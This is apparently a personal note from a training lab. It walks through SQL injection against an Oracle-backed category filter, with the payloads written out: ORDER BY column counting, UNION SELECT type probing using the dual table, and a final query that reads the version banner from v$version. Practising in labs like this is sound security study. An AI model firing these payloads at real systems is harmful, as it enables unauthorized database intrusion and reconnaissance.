#+title: SQL injection attack, querying the database type and version on Oracle
* TABLE OF CONTENTS :toc:
- [[#about][About]]
  - [[#end-goal][End Goal]]
- [[#steps][Steps]]
  - [[#step-1][Step 1]]
  - [[#step-2][Step 2]]
- [[#solution][Solution]]

* About
sql injection on ~category~ filter

** End Goal
Display database version string


* Steps
** Step 1
First find out how many columns are there in vulnerable sql query

#+begin_src sql
'ORDER BY 1 --
#+end_src
200 success
#+begin_src sql
'ORDER BY 2 --
#+end_src
200 success
#+begin_src sql
'ORDER BY 3 --
#+end_src
500 error

so column = 2

** Step 2
Now find out what type data those columns are using
#+begin_src sql
'UNION SELECT 'abc', NULL --
#+end_src

#+begin_quote
But this will give an error. Since this lab is using ~Oracle~ database system. In ~Oracle~ database we have to select at least one table with ~SELECT~ command. But we don't know any table in this lab database. But we can use the default table of ~Oracle~ database called ~dual~
#+end_quote

#+begin_src sql
'UNION SELECT 'abc', NULL FROM dual --
#+end_src
200 success. so column1 supports string type data

#+begin_quote
Now print the database version string value in this column to solve the lab
#+end_quote

* Solution
#+begin_src sql
'UNION SELECT banner, NULL FROM v$version --
#+end_src
